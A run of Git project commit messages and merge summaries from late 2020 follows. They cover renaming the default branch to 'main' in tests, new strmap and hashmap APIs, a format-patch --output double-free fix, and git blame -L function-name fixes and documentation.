In b6211b89eb (tests: avoid variations of the `master` branch name,
2020-09-26), the `master[123]` branch names were renamed to
`topic_[123]`. A non-literal mention of the corresponding files was
missed in that commit.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The message in question reads awkward with the name "master", but will
be even more confusing once that is renamed to "main". Let's adjust it
in advance of said rename.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In `git p4 clone`, we hard-code the branch name `master` instead of
looking what the _actual_ initial branch name is. Let's fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern MSVC or Windows versions don't support big-endian, so it's
unnecessary to consider architectures when using it.
This also makes ARM64 MSVC builds succeed.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Daniel Gurney <dgurney99@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Compression programs like zip, gzip, bzip2 and xz allow to adjust the
trade-off between CPU cost and size gain with numerical options from -1
for fast compression and -9 for high compression ratio. zip also
accepts -0 for storing files verbatim. git archive directly support
these single-digit compression levels for ZIP output and passes them to
filters like gzip.
Zstandard additionally supports compression level options -10 to -19, or
up to -22 with --ultra. This *seems* to work with git archive in most
cases, e.g. it will produce an archive with -19 without complaining, but
since it only supports single-digit compression level options this is
the same as -1 -9 and thus -9.
Allow git archive to accept multi-digit compression levels to support
the full range supported by zstd. Explicitly reject them for the ZIP
format, as otherwise deflateInit2() would just fail with a somewhat
cryptic "stream consistency error".
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 8de7eeb54b (compression: unify pack.compression configuration
parsing, 2016-11-15), we introduced identical copies of the `file_size`
helper into three test scripts, with the plan to eventually consolidate
them into a single copy.
Let's do that, and adjust the function name to adhere to the `test_*`
naming convention.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 3aef54e8b8 ("diff: munmap() file contents before running external
diff") introduced calls to diff_free_filespec_data in
run_external_diff, which may pass NULL pointers.
Fix this and prevent any such bugs in the future by making
`diff_free_filespec_data(NULL)` a no-op.
Fixes: 3aef54e8b8 ("diff: munmap() file contents before running external diff")
Signed-off-by: Jinoh Kang <luke1337@theori.io>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to adding strintmap for special-casing a string -> int mapping,
add a strset type for cases where we really are only interested in using
strmap for storing a set rather than a mapping. In this case, we'll
always just store NULL for the value but the different struct type makes
it clearer than code comments how a variable is intended to be used.
The difference in usage also results in some differences in API: a few
things that aren't necessary or meaningful are dropped (namely, the
free_values argument to *_clear(), and the *_get() function), and
strset_add() is chosen as the API instead of strset_put().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will facilitate adding entries to a strmap subtype in ways that
differ slightly from that of strmap_put().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix misspelled "specified" and "occurred" in documentation and
comments.
Signed-off-by: Marlon Rac Cambasis <marlonrc08@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Although strmap could be used as a string->int map, one either had to
allocate an int for every entry and then deallocate later, or one had to
do a bunch of casting between (void*) and (intptr_t).
Add some special functions that do the casting. Also, rename put->set
for such wrapper functions since 'put' implied there may be some
deallocation needed if the string was already found in the map, which
isn't the case when we're storing an int value directly in the void*
slot instead of using the void* slot as a pointer to data.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When strmaps are used heavily, such as is done by my new merge-ort
algorithm, and strmaps need to be cleared but then re-used (because of
e.g. picking multiple commits to cherry-pick, or due to a recursive
merge having several different merges while recursing), free-ing and
reallocating map->table repeatedly can add up in time, especially since
it will likely be reallocated to a much smaller size but the previous
merge provides a good guide to the right size to use for the next merge.
Introduce strmap_partial_clear() to take advantage of this type of
situation; it will act similar to strmap_clear() except that
map->table's entries are zeroed instead of map->table being free'd.
Making use of this function reduced the cost of
clear_or_reinit_internal_opts() by about 20% in mert-ort, and dropped
the overall runtime of my rebase testcase by just under 2%.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds a number of additional convienence functions I want/need:
* strmap_get_size()
* strmap_empty()
* strmap_remove()
* strmap_for_each_entry()
* strmap_get_entry()
I suspect the first four are self-explanatory.
strmap_get_entry() is similar to strmap_get() except that instead of just
returning the void* value that the string maps to, it returns the
strmap_entry that contains both the string and the void* value (or
NULL if the string isn't in the map). This is helpful because it avoids
multiple lookups, e.g. in some cases a caller would need to call:
* strmap_contains() to check that the map has an entry for the string
* strmap_get() to get the void* value
* <do some work to update the value>
* strmap_put() to update/overwrite the value
If the void* pointer returned really is a pointer, then the last step is
unnecessary, but if the void* pointer is just cast to an integer then
strmap_put() will be needed. In contrast, one can call strmap_get_entry()
and then:
* check if the string was in the map by whether the pointer is NULL
* access the value via entry->value
* directly update entry->value
meaning that we can replace two or three hash table lookups with one.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all the external users of head_hash have been converted to
use a opts->orig_head instead we can stop returning head_hash from
get_revision_ranges().
Because we want to pass the full object names back to the caller in
`revisions` the find_unique_abbrev_r() call that was used to initialize
`head_hash` is replaced with oid_to_hex().
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rather than passing a string around pass the struct object_id that the
string was created from call oid_hex() when we write the file.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already have a struct object_id containing the oid that we want to
set ORIG_HEAD to so use that rather than converting it to a string and
then calling get_oid() on that string.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After rebasing, ORIG_HEAD is supposed to point to the old HEAD of the
rebased branch. The code used find_unique_abbrev() to obtain the
object name of the old HEAD and wrote to both
.git/rebase-merge/orig-head (used by `rebase --abort` to go back to
the previous state) and to ORIG_HEAD. The buffer find_unique_abbrev()
gives back is volatile, unfortunately, and was overwritten after the
former file is written but before ORIG_FILE is written, leaving an
incorrect object name in it.
Avoid relying on the volatile buffer of find_unique_abbrev(), and
instead supply our own buffer to keep the object name.
I think that all of the users of head_hash should actually be using
opts->orig_head instead as passing a string rather than a struct
object_id around is a hang over from the scripted implementation. This
patch just fixes the immediate bug and adds a regression test based on
Caspar's reproduction example[1]. The users will be converted to use
struct object_id and head_hash removed in the next few commits.
[1] https://lore.kernel.org/git/CAFzd1+7PDg2PZgKw7U0kdepdYuoML9wSN4kofmB_-8NHrbbrHg@mail.gmail.com
Reported-by: Caspar Duregger <herr.kaste@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We've never intended to support diff's --output option in format-patch.
And until baa4adc66a (parse-options: disable option abbreviation with
PARSE_OPT_KEEP_UNKNOWN, 2019-01-27), it was impossible to trigger. We
first parse the format-patch options before handing the remainder off to
setup_revisions(). Before that commit, we'd accept "--output=foo" as an
abbreviation for "--output-directory=foo". But afterwards, we don't
check abbreviations, and --output gets passed to the diff code.
This results in nonsense behavior and bugs. The diff code will have
opened a filehandle at rev.diffopt.file, but we'll overwrite that with
our own handles that we open for each individual patch file. So the
--output file will always just be empty. But worse, the diff code also
sets rev.diffopt.close_file, so log_tree_commit() will close the
filehandle itself. And then the main loop in cmd_format_patch() will try
to close it again, resulting in a double-free.
The simplest solution would be to just disallow --output with
format-patch, as nobody ever intended it to work. However, we have
accidentally documented it (because format-patch includes diff-options).
And it does work with "git log", which writes the whole output to the
specified file. It's easy enough to make that work for format-patch,
too: it's really the same as --stdout, but pointed at a specific file.
We can detect the use of the --output option by the "close_file" flag
(note that we can't use rev.diffopt.file, since the diff setup will
otherwise set it to stdout). So we just need to unset that flag, but
don't have to do anything else. Our situation is otherwise exactly like
--stdout (note that we don't fclose() the file, but nor does the stdout
case; exiting the program takes care of that for us).
Reported-by: Johannes Postler <johannes.postler@txture.io>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In format-patch we're either outputting to stdout or to individual files
in an output directory (which may be just "./"). Our logic for whether
to open a new file for each patch is checked with "!use_stdout", but it
is equally correct to check for a non-NULL output_directory.
The distinction will matter when we add a new single-stream output in a
future patch, when only one of the three methods will want individual
files. Let's swap the logic here in preparation.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --stdout and --output-directory options are mutually exclusive, but
it's hard to tell from reading the code. We have three separate
conditionals that check for use_stdout, and it's only after we've set up
the output_directory fully that we check whether the user also specified
--stdout.
Instead, let's check the exclusion explicitly first, then have a single
conditional that handles stdout versus an output directory. This is
slightly easier to follow now, and also will keep things sane when we
add another output mode in a future patch.
We'll add a few tests as well, covering the mutual exclusion and the
fact that we are not confused by a configured output directory.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Early text written in 2006 explains the "--abbrev=<n>" option to
"show only a partial prefix", without saying that the length of the
partial prefix is not necessarily the number given to the option to
ensure that the output names the object uniquely.
Update documentation for the diff family of commands, "blame",
"branch --verbose", "ls-files" and "ls-tree" to stress that the
short prefix must uniquely refer to an object, and <n> is merely
the mininum number of hexdigits used in the prefix.
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The -L option is documented to accept no pathspec, but the
command line option parser has allowed the combination without
checking so far. Ensure that there is no pathspec when the -L
option is in effect to fix this.
Incidentally, this change fixes another bug in the command line
option parser, which has allowed the -L option used together
with the --follow option. Because the latter requires exactly
one path given, but the former takes no pathspec, they become
mutually incompatible automatically. Because the -L option
follows renames on its own, there is no reason to give --follow
at the same time.
The new tests say they may fail with "-L and --follow being
incompatible" instead of "-L and pathspec being incompatible".
Currently the expected failure can come only from the latter, but
this is to futureproof them, in case we decide to add code to
explicititly die on -L and --follow used together.
Heled-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 32c83afc2c (ci: github action - add check for whitespace errors,
2020-09-22), we introduced a GitHub workflow that automatically checks
Pull Requests for whitespace problems.
However, when affected lines contain one or more double quote
characters, this workflow failed to attach the informative comment
because the Javascript snippet incorrectly interpreted these quotes
instead of using the `git log` output as-is.
Let's fix that.
While at it, let's `await` the result of the `createComment()` function.
Finally, we enclose the log in the comment with ```...``` to avoid
having the diff marker be misinterpreted as an enumeration bullet.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11), we introduced a test case that wanted to talk about
"worktrees" but talked about "worktress" instead. Let's fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous three commits, We prepared the `t5515` script and the
files in `t/t5515/` for the upcoming change of the default branch name
to `main`. The changes were made over the course of three commits
because the overall patch would have been too big to send to the Git
mailing list for review.
Naturally, the test could not pass in the transitional stages and was
therefore disabled via the `PREPARE_FOR_MAIN_BRANCH` prereq. Now that
the transition is complete, we can re-enable it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous two commits, We just started preparing the `t5515` script
and part of `t/t5515/` for the upcoming change of the default
branch name to `main`. This patch adjusts the remainder of the supporting
material in `t/t5515/` (the patch adjusting all of `t/t5515/` would have
weighed more than 100kB and therefore not made it to the Git mailing
list for review).
Similar to what we did for the `t5515` script itself in the previous
commit, this patch was generated via:
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515/refs.*
In addition to that, we need to adjust some file _names_ in `t/t5515/`
because they encode the branch name:
eval "$(git ls-files t/t5515/refs.\* | sed -n \
-e 's/\(.*\)master\(.*\)/git mv & \1main\2;/p')"
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We just started preparing t5515 for the upcoming change of the default
branch name to `main`. This patch adjusts roughly half of the supporting
material in `t/t5515/` (the patch adjusting all of `t/t5515/` would have
weighed more than 100kB and therefore not made it to the Git mailing
list for review).
Similar to what we did for the `t5515` script itself in the previous
commit, this patch was generated via:
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515/fetch.*
In addition to that, we need to adjust some file _names_ in `t/t5515/`
because they encode the branch name:
eval "$(git ls-files t/t5515/fetch.\* | sed -n \
-e 's/\(.*\)master\(.*\)/git mv & \1main\2;/p')"
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As part of the effort to change the default branch name to `main`, let's
prepare t5515.
In addition to adjusting the references to the branch name itself, this
also requires two commit hashes to be adjusted (actually four, as there
is a SHA-1 _and_ a SHA-256 of both).
That trick was performed by running
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515-*.sh
These commit hashes have been determined manually, of course, by running
the test after adjusting only the branch names, and then copying the
hashes from the log of the failed run.
Note: this patch only touches the t5515 script so far, not the
supporting material in t/t5515/. The resulting patch would have weighed
over 100kB and therefore the Git mailing list would have dropped it. The
files in t/t5515/ will be adjusted in the next two commits. As t5515
would fail without these adjustments, we temporarily skip it via the
`PREPARE_FOR_MAIN_BRANCH` prereq.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow the testsuite to run where it treats requests for "recursive" or
the default merge algorithm via consulting the environment variable
GIT_TEST_MERGE_ALGORITHM which is expected to either be "recursive" (the
old traditional algorithm) or "ort" (the new algorithm).
Also, allow folks to pick the new algorithm via config setting. It
turns out builtin/merge.c already had a way to allow users to specify a
different default merge algorithm: pull.twohead. Rather odd
configuration name (especially to be in the 'pull' namespace rather than
'merge') but it's there. Add that same configuration to rebase,
cherry-pick, and revert.
This required updating the various callsites that called merge_trees()
or merge_recursive() to conditionally call the new API, so this serves
as another demonstration of what the new API looks and feels like.
There are almost certainly some callsites that have not yet been
modified to work with the new merge algorithm, but this represents the
ones that I have been testing with thus far.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust tests so that they won't scream when the default initial
branch name is changed to 'main'.
* js/default-branch-name-part-4-minus-1:
t1400: prepare for `main` being default branch name
tests: prepare aligned mentions of the default branch name
t9902: prepare a test for the upcoming default branch name
t3200: prepare for `main` being shorter than `master`
t5703: adjust a test case for the upcoming default branch name
t6200: adjust suppression pattern to also match "main"
tests: start moving to a different default main branch name
t9801: use `--` in preparation for default branch rename
fmt-merge-msg: also suppress "into main" by default
"git diff" family of commands learned the "-I<regex>" option to
ignore hunks whose changed lines all match the given pattern.
* mk/diff-ignore-regex:
diff: add -I<regex> that ignores matching changes
merge-base, xdiff: zero out xpparam_t structures
"git apply -R" did not handle patches that touch the same path
twice correctly, which has been corrected. This is most relevant
in a patch that changes a path from a regular file to a symbolic
link (and vice versa).
* jt/apply-reverse-twice:
apply: when -R, also reverse list of sections
"git rebase --rebase-merges" did not correctly pass --gpg-sign
command line option to underlying "git merge" when replaying a merge
using non-default merge strategy or when replaying an octopus merge
(because replaying a two-head merge with the default strategy was
done in a separate codepath, the problem did not trigger for most
users), which has been corrected.
* sc/sequencer-gpg-octopus:
t3435: add tests for rebase -r GPG signing
sequencer: pass explicit --no-gpg-sign to merge
sequencer: fix gpg option passed to merge subcommand
Our test scripts can be told to run only individual pieces while
skipping others with the "--run=..." option; they were taught to
take a substring of test title, in addition to numbers, to name the
test pieces to run.
* en/test-selector:
test-lib: reduce verbosity of skipped tests
t6006, t6012: adjust tests to use 'setup' instead of synonyms
test-lib: allow selecting tests by substring/glob with --run
Add a sample 'push-to-checkout' hook, that performs the same as
what the built-in default action does.
* as/sample-push-to-checkout-hook:
hook: add sample template for push-to-checkout
"git credential' didn't honor the core.askPass configuration
variable (among other things), which has been corrected.
* tk/credential-config:
credential: load default config
Document that the meaning of a Signed-off-by trailer can vary from
project to project in the end-user documentation, and clarify what
it means to this project.
* bk/sob-dco:
Documentation: stylistically normalize references to Signed-off-by:
SubmittingPatches: clarify DCO is our --signoff rule
Documentation: clarify and expand description of --signoff
doc: preparatory clean-up of description on the sign-off option
Test-coverage enhancement of running commit-graph task "git
maintenance" as needed led to discovery and fix of a bug.
* ds/maintenance-commit-graph-auto-fix:
maintenance: core.commitGraph=false prevents writes
maintenance: test commit-graph auto condition
When "git commit-graph" detects the same commit recorded more than
once while it is merging the layers, it used to die. The code now
ignores all but one of them and continues.
* ds/commit-graph-merging-fix:
commit-graph: don't write commit-graph when disabled
commit-graph: ignore duplicates when merging layers
A test helper "test_cmp A B" was taught to diagnose missing files A
or B as a bug in test, but some tests legitimately wanted to notice
a failure to even create file B as an error, in addition to leaving
the expected result in it, and were misdiagnosed as a bug. This
has been corrected.
* es/test-cmp-typocatcher:
Revert "test_cmp: diagnose incorrect arguments"
"git fast-import" wasted a lot of memory when many marks were in use.
* jk/fast-import-marks-alloc-fix:
fast-import: fix over-allocation of marks storage
The side-band status report can be sent at the same time as the
primary payload multiplexed, but the demultiplexer on the receiving
end incorrectly split a single status report into two, which has
been corrected.
* js/avoid-split-sideband-message:
test-pkt-line: drop colon from sideband identity
sideband: report unhandled incomplete sideband messages as bugs
sideband: avoid reporting incomplete sideband messages
Add strmap as a new struct and associated utility functions,
specifically for hashmaps that map strings to some value. The API is
taken directly from Peff's proposal at
https://lore.kernel.org/git/20180906191203.GA26184@sigill.intra.peff.net/
Note that similar string-list, I have a strdup_strings setting.
However, unlike string-list, strmap_init() does not take a parameter for
this setting and instead automatically sets it to 1; callers who want to
control this detail need to instead call strmap_init_with_options().
(Future patches will add additional parameters to
strmap_init_with_options()).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
hashmap_free(), hashmap_free_entries(), and hashmap_free_() have existed
for a while, but aren't necessarily the clearest names, especially with
hashmap_partial_clear() being added to the mix and lazy-initialization
now being supported. Peff suggested we adopt the following names[1]:
- hashmap_clear() - remove all entries and de-allocate any
hashmap-specific data, but be ready for reuse
- hashmap_clear_and_free() - ditto, but free the entries themselves
- hashmap_partial_clear() - remove all entries but don't deallocate
table
- hashmap_partial_clear_and_free() - ditto, but free the entries
This patch provides the new names and converts all existing callers over
to the new naming scheme.
[1] https://lore.kernel.org/git/20201030125059.GA3277724@coredump.intra.peff.net/
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-ort is a heavy user of strmaps, which are built on hashmap.[ch].
clear_or_reinit_internal_opts() in merge-ort was taking about 12% of
overall runtime in my testcase involving rebasing 35 patches of
linux.git across a big rename. clear_or_reinit_internal_opts() was
calling hashmap_free() followed by hashmap_init(), meaning that not only
was it freeing all the memory associated with each of the strmaps just
to immediately allocate a new array again, it was allocating a new array
that was likely smaller than needed (thus resulting in later need to
rehash things). The ending size of the map table on the previous commit
was likely almost perfectly sized for the next commit we wanted to pick,
and not dropping and reallocating the table immediately is a win.
Add some new API to hashmap to clear a hashmap of entries without
freeing map->table (and instead only zeroing it out like alloc_table()
would do, along with zeroing the count of items in the table and the
shrink_at field).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously, once map->table had been freed, any calls to hashmap_put(),
hashmap_get(), or hashmap_remove() would cause a NULL pointer
dereference (since hashmap_free_() also zeros the memory; without that
zeroing, calling these functions would cause a use-after-free problem).
Modify these functions to check for a NULL table and automatically
allocate as needed.
Also add a HASHMAP_INIT(fn, data) macro for initializing hashmaps on the
stack without calling hashmap_init().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variable 'option' is used in __git_ps1_show_upstream()
without being localized.
This clobbers the variable the user may be using for other
purposes, which is bad. Luckily, $option is not used to carry
information around in the script as a global variable. The use
of it in this script has very limited scope (namely, only inside
this function), so just declare that it is "local".
Signed-off-by: Sibo Dong <sibo.dong@outlook.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The penultimate commit moved the initialization of 'sb.path' in
'builtin/blame.c::cmd_blame' before the call to
'blame.c::setup_blame_bloom_data'. Since 'cmd_blame' is the only caller
of 'setup_blame_bloom_data', it is now unnecessary for
'setup_blame_bloom_data' to receive 'path' as a separate argument, as
'sb.path' is already initialized.
Remove this argument from setup_blame_bloom_data's interface and use the
'path' field of the 'sb' 'struct blame_scoreboard' instead.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit moved the initialization of 'sb.path' in
'builtin/blame.c::cmd_blame' before the call to
'blame.c::setup_scoreboard'. Since 'cmd_blame' is the only caller of
'setup_scoreboard', it is now unnecessary for 'setup_scoreboard' to
receive 'path' as a separate argument, as 'sb.path' is already
initialized.
Remove this argument from setup_scoreboard's interface and use the
'path' field of the 'sb' 'struct blame_scoreboard' instead.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In blame.c::cmd_blame, we send the 'path' field of the 'sb' 'struct
blame_scoreboard' as the 'path' argument to
'line-range.c::parse_range_arg', but 'sb.path' is not set yet; it's set
to the local variable 'path' a few lines later at line 1137.
This 'path' argument is only used in 'parse_range_arg' if we are blaming
a funcname, i.e. `git blame -L :<funcname> <path>`, and in that case it
is sent to 'parse_range_funcname', where it is used to determine if a
userdiff driver should be used for said <path> to match the given
funcname.
Since 'path' is yet unset, the userdiff driver is never used, so we fall
back to the default funcname regex, which is usually not appropriate for
paths that are set to use a specific userdiff driver, and thus either we
match some unrelated lines, or we die with
fatal: -L parameter '<funcname>' starting at line 1: no match
This has been the case ever since `git blame` learned to blame a
funcname in 13b8f68c1f (log -L: :pattern:file syntax to find by
funcname, 2013-03-28).
Enable funcname blaming for paths using specific userdiff drivers by
initializing 'sb.path' earlier in 'cmd_blame', when some of its other
fields are initialized, so that it is set when passed to
'parse_range_arg'.
Add a regression test in 'annotate-tests.sh', which is sourced in
t8001-annotate.sh and t8002-blame.sh, leveraging an existing file used
to test the userdiff patterns in t4018-diff-funcname.
Also, use 'sb.path' instead of 'path' when constructing the error
message at line 1114, for consistency.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git blame -h' and 'git log -h' both show '-L <n,m>' and describe this
option as "Process only line range n,m, counting from 1". No hint is
given that a function name regex can also be used.
Use <range> instead, and expand the description of the option to mention
both modes. Remove "counting from 1" as it's uneeded; it's uncommon to
refer to the first line of a file as "line 0".
Also, for 'git log', improve the wording to better reflect the long help.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Several Git commands can make use of the builtin userdiff patterns, but
it's not obvious in the documentation. Add pointers to the 'Defining a
custom hunk header' part of gitattributes(5) in the description of the
following options:
- the '--function-context' option of `git diff` and friends
- the '--function-context' option of `git grep`
- the '-L :<funcname>' option of `git log`, `gitk` and `git blame`
In 'git-grep.txt', take the opportunity to use backticks in the
description of '--show-function', and improve the wording of the
desription of '--function-context'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make it clearer that a function can be blamed by feeding `git blame`
'-L :<funcname>' by mentioning it at the beginnning of the description
of the '-L' option.
Also, in 'line-range-options.txt', which is used for git-log(1) and
gitk(1), do not parenthesize the mention of the ':<funcname>' mode, to
place it on equal footing with the '<start>,<end>' mode.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Improve the formatting of the description of the line-range option '-L'
for `git log`, `gitk` and `git blame`:
- Use bold for <start>, <end> and <funcname>
- Use backticks for literals
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description of the '-L' option for `git log` and `gitk` is almost
the same, but is repeated in both 'git-log.txt' and 'gitk.txt' (the
difference being that 'git-log.txt' lists the option with a space
after '-L', while 'gitk.txt' lists it as stuck and notes that `gitk`
only understands the stuck form).
Reduce duplication by creating a new file, 'line-range-options.txt',
and include it in both files.
To simplify the presentation, only list the stuck form for both
commands, and remove the note about `gitk` only understanding the stuck
form.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
hashwrite() already buffers writes, so pass the fanout table entries
individually via hashwrite_be32(), which also does the endianess
conversion for us. This avoids a memory copy, shortens the code and
reduces the number of magic numbers.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Calling rev-parse to check if the drop subcommand removed the last stash
and treating its failure as confirmation is fragile, as the command can
fail for other reasons, e.g. because the system is out of memory.
Directly check if the reflog is empty instead, which is more robust.
Reported-by: Marek Mrva <mrva@eof-studios.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the trivial search-and-replace performed over the course
of the previous three commits, there is one test in t5411 that depends
on the length of the default branch name.
Adjust it and use `main` as the default branch name in this test.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t/t5411/*
In the previous commit, we adjusted roughly half of the support files,
to stay under the 100kB limit (mails larger than that are rejected by
the Git mailing list).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t/t5411/test-00[3-5]*
We do not convert the files in `t/t5411/` in one go because the patch
would be too big (mails larger than 100kB are rejected by the Git
mailing list). Instead, we start with roughly half of the support files.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is a straight-forward search-and-replace in the test script;
However, this is not yet complete because it requires many more
replacements in `t/t5411/`, too many for a single patch (the Git mailing
list rejects mails larger than 100kB). For that reason, we disable this
test script temporarily via the `PREPARE_FOR_MAIN_BRANCH` prereq.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
First, references to --patch and -p appeared in the description of
git-format-patch, where the options themselves are not included.
Next, the description of --unified option elsewhere had duplicate implied
statements: "Implies --patch. Implies -p."
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
69d2cfe6e8 (bisect.c: remove the_repository reference, 2018-11-10) kept
the implicit the_repository reference in clear_commit_marks_all, which
was made explicit by the previous commit (and which also renamed it to
repo_clear_commit_marks). Replace it as well.
Signed-off-by: René Scharfe <l.s.r@web.de>
